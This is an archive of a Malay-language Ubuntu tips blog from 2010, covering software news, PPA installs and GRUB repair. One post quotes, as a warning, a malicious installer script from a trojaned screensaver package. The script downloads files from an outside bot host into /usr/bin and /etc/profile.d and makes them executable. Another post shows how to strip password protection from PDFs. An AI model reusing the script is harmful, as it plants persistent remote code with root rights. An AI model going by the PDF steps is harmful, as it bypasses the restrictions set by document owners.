Wednesday, June 30, 2010

Firefox 4.0 Beta 1 Dilepaskan (Ubuntu, Windows, Mac OSX)


Selepas versi stabilnya mencapai angka 3.6.6 dan memperkenalkan fungsi crash protection, hari ini Mozilla melepaskan versi ujian kepada firefox serba baru 4.0 beta 1 untuk dicuba dan  mengumpulkan respon daripada pengguna sekiranya terdapat bug dalam versi pembangunan ini. Sekiranya anda ingin membantu pembangunan firefox, anda boleh mencuba versi ujian ini dengan memuatturun dari pautan berikut:

Linux
Windows
Mac OSX 32 bits  64 bits

Bagi pengguna ubuntu, anda harus compile dari package TAR yang disediakan (dan saya rasa ianya tidak sesuai dicuba oleh newbie) sehinggalah terdapat PPA yang boleh dipercayai dan kita boleh menggunakannya.

Firefox 4.0 juga dikatakan akan memperkenalkan design baru kepada linux seperti screenshot yang dapat anda lihat diatas. Namun samada design terbaru tersebut didatangkan dalam beta1 ini atau tidak masih belum dapat disahkan selagi kita tidak mencubanya =)

Thumbnails untuk fail OpenOffice.org dalam ubuntu


Sekiranya anda ingin nautilus memaparkan fail openoffice.org dalam bentuk thumbnails, kini anda boleh memasangnya dengan cara dibawah.
sudo add-apt-repository ppa:flimm/ooo-thumbnailer
sudo apt-get update
sudo apt-get install ooo-thumbnailer
Selepas memasangnya, anda harus restart nautilus secara "killall nautilus" untuk ia memberikan kesan.

Seperti yang dapat anda lihat dalam screenshot, ooo-thumbnailer akan memaparkan thumbnail preview fail yang dihasilkannya dan ini memudahkan anda mengenalpasti fail yang tepat sebelum ia dibuka. Selamat mencuba.

Tuesday, June 29, 2010

Shutter 0.86.3 membawakan monochrome icon pada notification area


Akhirnya shutter, perisian mengambil cekupan desktop (screenshot) mendapat kemaskini terbaru dan membawakan monochrome icon pada notification area. Saya merupakan pengguna tegar perisian ini namun apabila iconnya pada notification area agak berlainan dari icon yang lain menyebabkan panel kelihatan menjadi tidak kemas.

Untuk maklumat lanjut berkenaan pemasangan sila ke halaman webupd8.


Monday, June 28, 2010

Sabily 10.04 Manarat Di lepaskan (Sistem Operasi untuk Muslim)


Sabily (dahulunya dikenali dengan ubuntu muslim edition @ ubuntume) telah mengumumkan terbitnya versi 10.04 memakai kod nama "manarat" yang bermaksud "menara masjid" kepada umum. Sabily merupakan pecahan linux yang dibangunkan berasaskan ubuntu dengan memasukkan artwork dan perisian berunsurkan agama islam ke dalamnya.

Apa yang terbaru?
- New "Manarat" pictures and wallpapers
- Zekr 0.7.6
- Thawab 3
- New offline recitation: Al-Muaiqly (48kbps)
- New parental web control application: nanny

Pembaharuan lain ialah ianya dibangunkan berasaskan ubuntu lucid lynx dan kesemua fungsi terbaru lucid lynx terdapat dalam manarat.

Anda boleh muatturun sabily di : http://www.sabily.org/website/index.php/en/sabily/downloads

Namun anda harus faham, oleh kerana ia diasaskan daripada ubuntu, anda boleh bila-bila masa untuk menaiktaraf ubuntu yang anda gunakan kepada sabily dengan menggunakan kaedah berikut;
sudo add-apt-repository ppa:sabily.team/ppa && sudo apt-get -q update
sudo apt-get install sabily
dan
sudo aptitude install webstrict
untuk parental control.

Selamat mencuba

Readability Untuk Chrome

Membaca bahan bacaan di laman web adakala menyeronokkan dengan pelbagai cerita menarik dari seluruh pelusuk dunia namun kadang-kala juga menyakitkan hati. Pernahkan anda bertemu dengan laman web atau blog yang menggunakna tulisan yang sangat kecil dengan paparan lebar (width) yang agak besar. Ianya mungkin ok bagi anda tetapi bagaimana pula dengan golongan yang lebih veteren?

Sekiranya anda pengguna pelayar web google chrome (chromium), anda boleh menggunakan extension readability untuk menukarkan website yang sukar dibaca tadi kepada satu paparan yang sedang untuk ditatap oleh mata.

sebelum


selepas

Tentunya extension ini sangat sesuai untuk tujuan pembacaan terutamanya bagi mereka yang tidak bercita-cita untuk memakai spek suatu hari nanti atau bagi mereka yang tidak bercita-cita untuk menambah kekuatan kanta spek mereka.

Sekiranya anda perasan, fungsi readability ini menyamai fungsi reader dalam Safari 5 yang menggunakan kod perisian terbuka.



Selamat mencuba.

Sunday, June 27, 2010

Pusat Rujukan Persuratan Melayu (PRPM) : Rujukan Inggeris - Melayu Terkini Online

Adakah anda terlibat dengan penterjemahan perisian sumber terbuka dari bahasa inggeris ke bahasa melayu? Masalah utama proses ini hingga ke hari ini ialah kita tidak mempunyai rujukan tunggal. Lalu penterjemah mentafsirkan sesuatu perkataan mengikut apa yang dia faham. Oleh kerana ramai penterjemah yang terlibat, efisiensi, kepersisan dan kejituan sesuatu penterjemahan yang dihasilkan adalah tidak begitu membanggakan.

Saya dimaklumkan oleh Sdr Tajul Azhar (terima kasih) bahawa Seorang pensyarah dari UKM iaitu Dr Shanudin telah bekerjasama dengan Dewan Bahasa dan Pustaka untuk menghasilkan sesuatu yang dinamakan Pusat Rujukan Persuratan Melayu (PRPM) yang boleh dilayari di : http://prpm.dbp.gov.my/. Berita menariknya ialah, banyak istilah IT yang telah dikemaskini dan dengan perkembangan ini, penterjemah yang selama ini terkial-kial menggunakan istilah sendiri boleh membuat rujukan ketika membuat kerja-kerja penterjemahan.


Satu perkembangan yang baik bukan sahaja dalam bidang IT tetapi juga semua bidang yang memerlukan penterjemahan dari bahasa inggeris ke bahasa malaysia. Tahniah kepada yang terlibat menjayakan projek ini.

Saturday, June 26, 2010

Videoshot penggunaan Alpine 2.0

Hantar E-mel Dari Terminal


Bunyi macam geek kan? Tetapi sebenarnya mudah je. Alpine 2.0, bukan pokok pine mahupun produk stereo kereta tetapi ia adalah perisian client mail. Namun ia berbeza dengan client mail yang lain kerana ia hanya memerlukan Command Line Interface(CLI) berbanding Graphical User Interface(GUI). Ini bermakna emel juga boleh dihantar tanpa login ke Gnome pun. Alpine dilesen bawah Apache License.

Cara instalasi:
sudo apt-get install alpine

sesudah instal, buka terminal dan taipkan alpine, masukkan ini ke dalam seksyen Config jika emel anda adalah indie.gmail.com:

Personal name=indie

User domain=gmail.com

SMTP server=smtp.gmail.com:587/tls/user=indie@gmail.com

Inbox path={pop.gmail.com/pop3/ssl/novalidate-cert/user=indie@gmail.com}INBOX

Dah siap. Sekarang sudah boleh periksa emel anda dan hantar emel.

Ciri-ciri:
-Menyokong pop3 dan IMAP
-Minimal client emel
-kebolehan menghantar emel menerusi SMTP

Baik:
-Senang digunakan bagi noob macam saya
-Interface mudah yang tidak memakan RAM yang banyak
-Mempunyai fail HELP yang tersusun

Buruk:
-Kadang-kadang Server lambat reply

Pendapat:
-Tidak banyak pengguna Ubuntu menggunakan CLI sedangkan itu adalah kelebihan yang ada pada pengguna Ubuntu berbanding pengguna Win...

Maklumat lanjut:
  1. http://www.washington.edu/alpine/
  2. http://en.wikipedia.org/wiki/Alpine_(e-mail_client)

Friday, June 25, 2010

Install Ubuntu Netbook Remix Launcher dalam Ubuntu Lucid Lynx

Ubuntu Netbook Remix merupakan versi ubuntu yang direka khas untuk komputer netbook. Antara identiti penting dalam versi ubuntu ini ialah ia mempunyai launcher aplikasi yang tersendiri yang meliputi desktop komputer seperti yang dapat anda lihat dalam gambar dibawah.


Sekiranya anda ingin mencuba launcher ini dalam ubuntu standard, sila ikuti langkah berikut;

1.Buka Ubuntu Software Center dan search "netbook-launcher-efl".

2.Install.

3.Selesai install, tekan Alt + F2 dan taipkan "netbook-launcher-efl". Enter.

Whoops. Anda sepatutnya boleh melihat launcher ini pada desktop anda sekarang.

Sukakanya? Anda boleh menambah "netbook-launcher-efl" ke startup application untuk membolehkan launcher ini dilancarkan setiap kali anda start ubuntu.

Bencikannya? Anda perlu buka system monitor dan end process pada "netbook-launcher-efl" kemudian anda boleh uninstall juga menggunakan ubuntu software center.

Tahukah anda? Bill Gates sudah tidak ada kena mengena dengan Microsoft!

Bill Gates tidak perlu diperkenalkan lagi merupakan sosok paling familiar setiap kali kita berbicara tentang Microsoft, syarikat pengeluar sistem operasi paling femes dibumi. Namun masa yang terus berputar ligat meninggalkan kenangan lalu dan ketika ini, kita sudah boleh mengatakan Bill Gates sudah tidak mempunyai apa-apa kaitan dengan Microsoft. Hal ini didedahkan oleh ITWorld.com dan mungkin kerana itu jugalah sosok ini bukan lagi manusia paling kaya di bumi.

Samada beliau disukai atau dibenci, kini Bill Gates menghabiskan hari-harinya dengan kerja-kerja amal di Bill and Melinda Gates Foundations dan juga menghantar dan mengambil anak sekolah.

Bagaimana pula Microsoft? Syarikat Microsoft kini dikuasai oleh sosok bernama Steve Ballmer. Lalu apa jua kemarahan anda terhadap sistem operasi windows ketika ini, diharap jangan lagi menyalahkan sosok Bill Gates yang tidak ada kena mengena dengan Microsoft. Salahkan Steve Ballmer yang mempunyai reputasi buruk dalam mendengar sesuatu yang beliau tidak mahu dengar.

Game seperti KillBillGates pula selepas ini harus menukar namanya kepada killsteves killballmer dan seumpamanya.

Thursday, June 24, 2010

Ailurus Computer Doctor menjadikan tulisan pada flash menjadi buruk? Ok, ini penyelesaiannya.

Tempoh hari saya ada menulis mengenai Ailurus 10.05 dengan fungsi computer doctor. Namun fungsi tersebut merosakkan tulisan pada flash. Hari ini apabila saya upgrade Ailurus ke versi terkini iaitu versi 10.06.8, ailurus sendiri menerbitkan satu fix untuk memperbetulkan masalah ini. Sekiranya anda salah seorang yang terkesan dari masalah ini, sila upgrade ailurus anda dan gunakan fungsi computer doctor untuk memperbaikinya.





Semoga bermanfaat.

Auto Mount partition ketika sistem ubuntu dihidupkan

Katakan anda dualboot ubuntu bersama sistem operasi windows 7 dan ingin partition yang mengandungi windows 7 itu automount setiap kali anda hidupkan ubuntu. Secara default, ianya tidak automount dan ini menyebabkan seseorang pengguna perlu mount partition tersebut secara manual (walaupun taklah sesusah mana pun). Ada kalanya juga, partition tersebut mount tetapi dalam mode "read only" menyebabkan anda gagal untuk mengalihkan dan membuat perubahan dalam partition windows 7 itu tadi.

Terdapat satu tool yang memudahkan anda automount dan menetapkan supaya partition tersebut adalah dalam status "read and write". Ianya ialah Storage Device Manager yang diboleh dipasang dan dibuang menggunakan Ubuntu Software Center dengan kata carian "pysdm".

Selepas memasangnya, ia boleh dibuka dari menu System - Administration - Storage Device Manager.


Kemudian, pilih partition yang ingin anda automount, klik ok untuk konfigurasi selanjutnya. Klik pada butang assistant dan anda boleh uncheck ketetapan "Mount file system in read only mode" dan check "The file system is mounted at boot time". Kemudian klim mount - apply - close.

p/s : mudahnya ubuntu sekarang. tak perlu lagi ubah fail konfigurasi guna nano editor dalam terminal..huhu

Ubuntu Free Culture Showcase!

Adakah anda ahli muzik?
Adakah anda kreatif dalam menghasilkan illustrasi wallpaper?
Adakah anda gemar mengambil gambar menarik?
Atau adakah anda pandai menghasilkan video animasi yang hebat?

Sekiranya anda sedang menggunakan ubuntu, sila buka direktori home kemudian buka folder dengan nama example. Dalam folder example terdapat satu folder dengan nama Ubuntu_Free_Culture_Showcase dan didalamnya terdapat 2 fail (bagi kes saya) iaitu satu fail audio dan satu lagi video. Fail ini merupakan hasil tangan komuniti pengguna ubuntu yang menyumbangkan hasil kerja mereka untuk Ubuntu Free Culture Showcase.

Sertai Ubuntu Free Culture Showcase dengan menyumbang hasil kerja anda dan ianya akan disertakan ke dalam distro ubuntu yang bakal dilancarkan pada 10.10.10 ini.

Keterangan lanjutan boleh didapati dari laman berikut : https://wiki.ubuntu.com/UbuntuFreeCultureShowcase

Anda pasti berminat untuk melihat hasil tangan komuniti ubuntu yang lain dan ianya boleh diakses dari laman berikut; flickr, soundcloud, vimeo, deviantart

Ops, satu lagi perkara. Hasil kerja anda itu harus menggunakan 100% perisian sumber terbuka =)

Wednesday, June 23, 2010

Mencuba Youtube Online Video Editor di Testtube

Youtube telah melancarkan satu fungsi baru iaitu youtube video editor yang membolehkan pengguna membuat editasi basic keatas video yang diupload ke youtube. Menariknya pengguna tidak perlu memasang apa-apa perisian kerana fungsi ini 100% berada dalam internet dengan penggunaan teknologi cloud computing.


Pengguna boleh mencuba fungsi terbaru ini dengan pergi testtube, dan klik pada Video Editor - Try it Out. Untuk peringkat pengenalan ini, pengguna boleh membuat editasi mudah seperti;

  • mengabungkan 2 video
  • memotong bahagian video yang tidak diperlukan
  • memasukkan audio ke dalam video
Setelah selesai proses editasi, pengguna boleh masukkan title kepada video tadi dan kemudian publish kepada umum.

Bagi pengguna ubuntu, sekiranya anda mempunyai masalah kerosakkan pada fail video yang direkod menggunakan gtk-recordmydesktop, sila baca entry lepas untuk penyelesaiannya. Khabar angin mengatakan ffmpeg 0.6 dapat menyelesaikan masalah tersebut tetapi saya masih belum mencubanya kerana pakej ffmpeg belum ada dalam ppa.

Tuesday, June 22, 2010

Gagal login YM dalam Empathy

Selepas kemaskini aplikasi Empathy baru-baru ini, kelihatan muncul satu masalah iaitu pengguna gagal untuk login YM dalam empathy. Seperti yang dapat anda lihat dalam screenshot disebelah, tidak ada sebab spesifik yang menerangkan masalah ini.

Saya sedang mencari penyelesaian kepada masalah ini dan mungkin pihak ubuntu akan sekali lagi mengemaskini empathy untuk memperbaiki masalah ini. Bagi kipas susah mati YM, anda masih boleh menggunakan pidgin atau gyache untuk berchatting dengan rakan-rakan YM anda.

Sekiranya ada tahu penyeleasaian kepada masalah ini, sila nyatakan di bahagian komen dibawah. Terima kasih =)

Monday, June 21, 2010

Celestia beraksi!

Bagi yang mahu melihat bagaimana rupa Celestia. Video ini dirakam menggunakan gtk-recordMyDesktop.

Sistem:
-Ubuntu 9.10 Karmic
-Kernel 2.6.31-22-generic
-Platform i686
-intel core 2 duo
-Ram 488. Mb

Series60-Remote : Pengurus telefon bimbit S60 (Nokia)

Apabila ia datang ke topik menguruskan telefon bimbit, linux mempunyai sejarah yang tidak begitu positif dari segi sokongan perisian. Jujur, berapa banyak syarikat telefon bimbit menyediakan perisian pengurus untuk linux? Lalu, kita bertanya apa pilihan yang kita ada sekiranya kita menggunakan 100% linux dalam komputer kita? Saya yakin ini antara persoalan yang kerap berlegar dalam fikiran anda juga.


Series60-Remote merupakan perisian pengurus telefon bimbit S60 untuk linux yang dibangunkan diatas asas untuk memenuhi keperluan pengguna linux seperti ubuntu. Ia menyokong kebanyakkan model telefon bimbit nokia seperti E50, E60, E61, E65, N73, N91, 5700 XpressMusic, 6110 Navigator, E71, E90, N95, dan sebagainya (periksa disini). Menggunakan perisian ini, anda boleh menghantar dan menerima mesej secara terus melalui komputer, sync contact dan mesej, pengurusan contact, pengurus fail dan sebagainya. Ianya diuruskan menerusi sambungan bluetooth.

Pemasangan Series60-Remote

Muatturun package DEB dari halaman muatturun disini : http://series60-remote.sourceforge.net/index.php?module=Content&func=view&pid=7&lang=en

Pasang dan lancarkan perisian tersebut. Ikut arahan yang dinyatakan oleh perisian tersebut (pastikan bluetooth ubuntu dan telefon anda ON).

Sunday, June 20, 2010

Mengembara ke alam semesta dengan CELESTIA

Tak perlu sistem yang canggih-canggih untuk melihat angkasa lepas. Anda hanya perlukan sebuah komputer dan perisian Celestia. Celestia membolehkan anda mengembara ke sistem solar dan lebih 100, 000 bintang di dalam galaksi.

Cara instalasi:

Gunakan Synaptic package manager

atau

" Sudo apt-get install celestia "

Apa yang terdapat dalam Celestia:

-Pengalaman 3D alam semesta
-Pergerakan sebenar alam semesta
-Kebolehan mencari
-Zoom
-Antaramuka klik untuk pergi(point to go)

Baik:

-Percuma :)
-Perspektif 3D
-Mempunyai addon untuk antaramuka yang lebih realistik

Buruk:

-Help file yang yang tidak berfungsi(mungkin yang yang memakai environment KDE tidak ada masalah)
-Tiada maklumat tambahan tentang elemen dalam galaksi


Pendapat:

-Bagus untuk memupuk minat dalam astronomi
-Boleh melihat bagaimana planet atau bintang mengorbit dalam masa sebenar(real time)
-Bagus untuk pembelajaran di sekolah, kolej mahupun di peringkat universiti.

MSC Malaysia Open Source Conference (MOSC) + Ubuntu Global Jam


Kepada kaki kipas susah mati (die hard fans) perisian sumber terbuka, 29 Jun ~ 1 Julai ini mungkin sudah tersemat dalam to-do-list anda satu program anjuran OSDC.my iaitu MSC Malaysia Open Source Conference (MOSC) bertempat di Berjaya Times Square Hotel, Kuala Lumpur.

Program ini mengumpulkan penceramah dalam pelbagai kepakaran komputer terutamanya yang berkaitan pembangunan perisian sumber terbuka yang antaranya lainya ialah wakil dari Red Hat,  Novell, Microsoft, IBM, Joomla, dan sebagainya. Sekiranya anda hard core dengan pembangunan & ilmu perisian sumber terbuka, event ini tidak seharusnya anda lepas begitu sahaja.

Kemudian pada 29 Julai bermula dari 5.30 petang sehingga 8.00 malam, komuniti ubuntu malaysia menganjurkan Ubuntu Global Jam yang percuma untuk disertai. Program seperti ini biasanya akan mengumpulkan pengguna, penggemar, dan komuniti ubuntu di malaysia bagi tujuan berkenalan, sembang bebas, dan sebagainya (tentatif nampaknya masih belum siap : rujuk - http://ubuntu.com.my/).

NOTA : Saya tidak dapat menyertai anda disana pada hari tersebut dan saya doakan program berjalan dengan lancar dan penuh bermanfaat. =)

Crack password fail PDF dalam ubuntu


Sekiranya anda biasa bermain-main dengan fail dalam format PDF, anda biasanya akan mendapati terdapat beberapa fail PDF akan dilindungi dengan menggunakan password untuk menghadkan atau menghalang penyalahgunaan kandungan dokumen tersebut. Kadang-kala ianya sangat melecehkan. Untuk crack perlindungan fail PDF seperti ini, anda hanya perlu lakukan berikut dalam ubuntu;

1.Buka terminal, copypaste kata arahan dibawah;
sudo apt-get install context
2.Katakan fail PDF sasaran ialah protected.pdf dan fail yang telah dicrack anda ingin namakan out.pdf, masukkan arahan dibawah;
pdftops protected.pdf out.ps
pstopdf out.ps out.pdf
3.Siap. Err...susah ke?

Saturday, June 19, 2010

Mendapatkan kembali grub 2 dalam komputer anda [baiki masalah grub error]


Ini adalah entry penting yang harus di bookmark sekiranya anda dualboot komputer anda. Saya pernah menulis perkara yang hampir sama sebelum ini tetapi memandangkan sejak ubuntu karmic menggunakan grub versi 2, maka caranya juga telah berubah.

Anda berpotensi mempunyai masalah dengan grub sekiranya anda memasang sistem operasi lain ke dalam komputer yang mempunyai sistem operasi ubuntu atau dengan sambil lewa mencuba sesuatu yang boleh membunuh si kucing.hehe.. Setakat ini saya belum mengalami masalah grub kerana komputer saya adalah 100% ubuntu sahaja. Sekiranya anda mempunyai apa-apa masalah dengan grub, sila cuba cara dalam entry ini.

1.Anda perlukan ubuntu live cd (atau apa-apa linux live cd). Masukkan ke dalam tray dan boot ke dalam live cd.

2.Buka terminal dan masukkan kata arahan berikut;
a.kata arahan ini ialah untuk mencari partition mana sistem operasi ubuntu anda berada.
sudo fdisk -l
katakan sistem ubuntu berada dalam partition sda1

b.kata arahan kedua akan mount partition yang anda kenalpasti di "a"
sudo mount /dev/sda1 /mnt
c.kata arahan ini akan memasang grub ke dalam HD yang mempunyai partition ubuntu yang anda kenalpasti tadi
sudo grub-install --root-directory=/mnt/ /dev/sda
3.Restart komputer dan anda sepatutnya boleh melihat grub loader.

4.Oleh kerana kata arahan diatas akan membuang entry pada grub asal, anda perlu update grub yang baru dipasang tadi dengan kata arahan berikut;
sudo update-grub
Saya harap maklumat ini membantu anda =)

Friday, June 18, 2010

Berapa Kerap Anda Kemaskini Ubuntu Anda?

Entry kali ini sedikit ringan, dibuat tatkala tak boleh tidur di malam hari nih. :-)

Salah satu perkara yang membawa kelebihan kepada ubuntu ialah kemudahan untuk kemaskini aplikasi dengan mudah. Cuma dengan beberapa kali tekan sahaja, kesemua aplikasi yang ada sudah dikemaskini.

Tidak seperti Windows, walaupun mempunyai "update centre", ialah hanya untuk mengemaskini windows itu sendiri, driver untuk hardware dan juga lain - lain perisian yang berkaitan dengan microsoft (macam microsoft office). Tapi untuk aplikasi lain seperti firefox, chrome, winamp, atau lain - lain, memerlukan anda kemaskini satu persatu. Lecehkan?

Oleh itu, saya suka kemaskini ubuntu setiap hari dan ini menjadi kelebihan yang sangat mantap untuk ubuntu. FTW.

Anda, berapa kali kemaskini?

damhamaza
penulis sambilan di sini

GStyle : Themes Manager untuk Gnome


Apabila bercakap berkenaan tema, ubuntu yang menggunakan antaramuka gnome sememangnya sangat mudah untuk menukar tema bahkan lebih mudah dari menukar baju. Menggunakan Gstyle, segalanya akan menjadi lebih mudah termasuk mempunyai fungsi seperti;
  • preview tema dalam tanpa mengubah persekitaran keseluruhan
  • muatturun package tema yang terkenal seperti mac4lin, balanzan, wild-shine dan sebagainya
  • fungsi menukar tema GDM (rindukan fungsi ini)
  • dan lain-lain lagi
Memasang GStyle dalam ubuntu lucid lynx

Masukkan command berikut ke terminal;
sudo apt-add-repository ppa:s-lagui/ppa && sudo aptitude update && sudo aptitude install gstyle
Selepas proses pemasangan selesai, GStyle boleh dilancarkan pada menu system - preferences - style.

Selamat mencuba.

Wednesday, June 16, 2010

5 Game windows berfungsi out-of-the-box menggunakan Wine dalam Ubuntu

Baru-baru ini saya menjalankan sedikit kaji selidik untuk mengetahui halangan pengguna komputer dari menggunakan ubuntu (sila sertai kaji selidik ini jika anda belum). Keputusan semasa menunjukkan 17% daripada peserta kaji selidik mengatakan ubuntu tidak mempunyai game best-best dan ia bukan sesuatu yang mengejutkan. Hari ini, saya ingin perkenalkan 10 game windows yang dipasang ke dalam ubuntu menggunakan wine dan game tadi boleh dimain tanpa masalah (flawlessly and out of the box) tanpa apa-apa kofigurasi tambahan.

1.Guild Wars All Versions
Guild Wars is an episodic series of multiplayer online role-playing games created by ArenaNet, a Seattle game development studio and a subsidiary of the South Korean game publisher NCsoft.


2.Command & Conquer 3: Tiberium Wars 1.x
Command & Conquer 3 is a real-time strategy video game.


3.Counter-Strike: Source Retail / Steam
Counter-Strike: Source is the latest release of Counter-Strike, the planet's most popular squad-based Tactical Action FPS, where players co-operate as part of a team to achieve objectives.


4.Warcraft III The Frozen Throne: 1.x
Warcraft III: Reign of Chaos is the fourth game installment of the Warcraft story (including the expansion to Warcraft II, Beyond the Dark Portal). The Orcs and Humans continue to fight each other at their own peril according to a mysterious prophet.


5.Runes of Magic Official release
Runes of Magic is a MMORPG like WoW or GW free2Play.


Cukup sekadar 5 dan senarai semua game yang berfungsi sepenuhnya menggunakan wine dalam ubuntu ialah 1293 game. Sila klik disini untuk melihat senarai tersebut.

Tuesday, June 15, 2010

Mesti Baca : Adakah linux masih 100% invisible dari virus?


Saya merupakan seorang pengguna ubuntu linux yang sebab awalnya beralih menggunakan ubuntu kerana masalah virus dan antivirus dalam sistem operasi windows. Namun apabila muncul persoalan ini, saya masih boleh menjamin bahawa sepanjang 3~4 tahun menggunakan ubuntu, saya tidak pernah berhadapan dengan apa-apa masalah virus dalam ubuntu. Tetapi disini saya ingin menarik perhatian pembaca tentang satu peristiwa berikut;

Seorang pengguna ubuntu telah melaporkan satu perkara yang mengemparkan dalam forum ubuntu. Conorsulli mengatakan beliau telah muatturun satu fail DEB screensaver dari Gnome-look dan apabila dipasang, ia tidak menambahkan screensaver baru ke dalam list screensaver. Apabila diperiksa code package tersebut, beliau mendapati salah satu failnya mempunyai sesuatu yang mengejutkan kerana ia tertulis satu bash script seperti berikut;

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


Saya tidak expert dalam bash script tetapi saya boleh beritahu script ini boleh menjadi apa sahaja yang dimahukan oleh penciptanya. Ia mampu mengantikan beberapa fail dalam folder system /usr/bin/ dan diganti dengan fail yang diciptanya. Apa yang bahaya ialah ia memperolehi keistimewaan root kerana pengguna memasukkan password tersebut ketika cuba memasang package DEB itu tadi.

Secara istilahnya, ancaman seperti diatas dipanggil botnet.

Apa yang perlu dilakukan?

1 - Hanya gunakan repository rasmi atau yang diketahui dan disyorkan sahaja.
2 - Elak software .DEB atau .RPM dari sumber-sumber yang tidak diketahui

Perlukah memakai antivirus?

Tak perlu. Dengan 2 langkah pencegahan diatas, ubuntu linux anda adalah selamat. Ini kerana dalam ubuntu tidak ada fungsi  autorun, dan fail apa pun tidak disetkan secara default sebagai executable disamping virus perlu mendapat root password sebelum boleh 'mencederakan' system ubuntu anda.

Monday, June 14, 2010

Tempahan tshirt ubuntu limited edition


Yang ditunggu sudah tiba. Tempah tshirt ubuntu ini secepat yang mungkin.

Download maklumat detail berkenaan tshirt :


Klik butang dibawah untuk membuat tempahan :



Saya menasihati anda supaya membuat tempahan segera jika tidak mahu ketinggalan. Rekod saya sebelum ini menunjukkan 120 helai tshirt habis ditempah dalam 4 hari sahaja. Jangan lupa klik butang recommend dibawah =).

Kata-kata yang mungkin akan mengubah hidup anda

Semoga ada yang mengambil kebaikan dari senarai ini. Saya cuba menterjemahkannya kepada bahasa malaysia untuk memberi kefahaman kepada mereka yang tidak begitu memahami bahasa inggeris. Dalam senarai ini saya tidak sertakan hadis, kata-kata hikmah para ulama yang lebih hebat dan mantap. Insyaallah lain kali =)

1. “Courage is the discovery that you may not win, and trying when you know you can lose.” – Tom Krause

Maksud : Keberanian adalah satu penemuan yang anda mungkin tidak akan menang, dan mencuba walaupun apabila anda tahu anda akan kalah.


2. “The greatest barrier to success is the fear of failure.” – Sven Goran Eriksson

Maksud : Halangan terhebat untuk berjaya ialah takut untuk gagal.


3. “Every accomplishment starts with the decision to try.” – Unknown

Maksud : Setiap pencapaian bermula dari keputusan untuk mencuba.


4. “Shoot for the moon. Even if you miss, you’ll land among the stars.” – Brian Littrell

Maksud : Jadikan bulan sebagai target. Sekiranya anda tersasar, anda mungkin akan mendarat di kalangan bintang-bintang.


5. “Success is not final, failure is not fatal: it is the courage to continue that counts.” – Winston Churchill

Maksud : Kejayaan bukanlah penghabisan, kegagalan bukannya noktah, apabila yang dikira ialah keberanian untuk meneruskan.


6. “Motivation is what gets you started. Habit is what keeps you going.” – Jim Rohn

Maksud : Motivasi menjadikan anda bermula, kebiasaan menjadikan anda istiqamah.


7. “When it is obvious that the goals cannot be reached, don’t adjust the goals, adjust the action steps.” – Confucius

Maksud : Apabila ianya jelas matlamat mustahil untuk dicapai, jangan ubah matlamat tetapi ubahlah cara mencapainya.


8. “Trust yourself. You know more than you think you do.” – Benjamin Spock

Maksud : Percayakahlan diri anda. Anda tahu lebih dari apa yang anda fikir anda tahu.


9. “Nobody can go back and start a new beginning, but anyone can start today and make a new ending.” – Maria Robinson

Maksud : Tiada siapa yang boleh balik ke masa silam dan memulakan permulaan yang baru, tetapi sesiapa sahaja boleh bermula hari ini untuk menghasilkan penghabisan yang baru.


10. “A goal is not always meant to be reached, it often serves simply as something to aim at.” – Bruce Lee

Maksud : Matlamat tidak semestinya menjadi sesuatu yang harus dicapai, tetapi ia mungkin sesuatu yang anda selalunya harus target.


11. “Fall seven times, Stand up eight.” – Japanese Proverb

Maksud : Anda jatuh 7 kali, bangkit 8 kali.


12. “Every choice you make has an end result.” – Zig Ziglar

Maksud : Setiap pilihan yang anda buat mempunyai keputusan di akhirnya.


13. “I’ve failed over and over and over again in my life and that is why I succeed.” – Michael Jordan

Maksud : Saya telah gagal, dan gagal, dan gagal dalam kehidupan saya dan oleh kerana itu saya berjaya.


14. “Don’t let the past steal your present” – Cherralea Morgen

Maksud : Jangan biarkan masa silam anda mencuri masa sekarang anda.


15.“The great danger for most of us is not that our aim is too high and we miss it, but that it is too low and we reach it” - Michelangelo

Maksud : Ancaman terhebat kepada kita semua bukanlah impian kita yang terlalu tinggi dan kita tidak mampu mencapainya, tetapi impian kita terlalu rendah dan kita akan mencapainya.


16."Your mind is for having ideas, not for holding them" – David Allen.

Maksud : Minda anda ialah untuk mempunyai idea, dan bukannya "menyimpan" idea.

Sunday, June 13, 2010

7 kata arahan yang memudahkan hari anda bersama ubuntu.

Menggunakan ubuntu, anda sebenarnya tidak dapat lari dari menggunakan terminal. Sebab utamanya ialah kerana terminal memudahkan kerja anda dan bukannya menyusahkan. Kesilapan tanggapan pengguna ubuntu yang baru apabila mengatakan penggunaan terminal menyusahkan mereka sedangkan dengan menggunakan terminal, kita hanya perlu memasukkan kata arahan dan tekan Enter pada keyboard. Persoalannya, adakah kata arahan itu perlu difikirkan terlebih dahulu? Tidak! Kerana blog ini misalnya memberikan anda kata arahan tersebut dan anda hanya perlu copy paste sahaja kata arahan tersebut ke dalam terminal kemudian tekan Enter. Sekiranya anda masih mempunyai tanggapan bahawa penggunaan terminal itu menyusahkan, hari ini saya ingin senaraikan kata arahan yang paling biasa digunakan dalam ubuntu supaya anda dapat baca, ingat, faham dan boleh menggunakannya dikala diperlukan.

sudo apt-get update

Kata arahan ini berfungsi untuk memeriksa kemaskini paket perisian dalam ubuntu. Ia biasanya digunakan ketika pengguna ubuntu ingin memeriksa kemaskini pakej dan perisian dalam ubuntu yang digunakan dan selepas memasukkan PPA untuk tujuan pemasangan perisian baru. Tahukah anda sekiranya anda ingin melakukan perkara yang sama anda secara grafik (GUI), anda perlu ke menu System - Administration - Update Manager kemudian klik pada butang Check. Ternyata melakukannya secara GUI melibatkan banyak pergerakkan cursor dan klik. Kesimpulannya, menggunakan terminal adalah lebih mudah bukan?

sudo apt-get upgrade

Kata arahan ini pula untuk mengemaskini pakej perisian ubuntu anda. Melakukannya secara GUI sama seperti diatas tetapi anda perlu klik pada butang Install Update. GUI juga melibatkan banyak pergerakkan cursor dan klik.

aptitude show nama_pakej

Anda ingin memasang satu pakej tetapi bagaimana anda tahu ia ada dalam sumber perisian ubuntu anda atau tidak. Ok, mungkin ada yang keliru disini. Perisian dan pakej merupakan 2 benda yang berbeza. Satu perisian terdiri daripada 1 atau lebih pakej. 1 pakej mungkin hanyalah satu dependency untuk perisian tertentu. Mencari perisian dan pakej boleh dilakukan menggunakan Ubuntu Software Center. Menggunakan kata arahan diatas adalah lebih mudah sekiranya terminal sudah terbuka.

sudo apt-get install nama_pakej

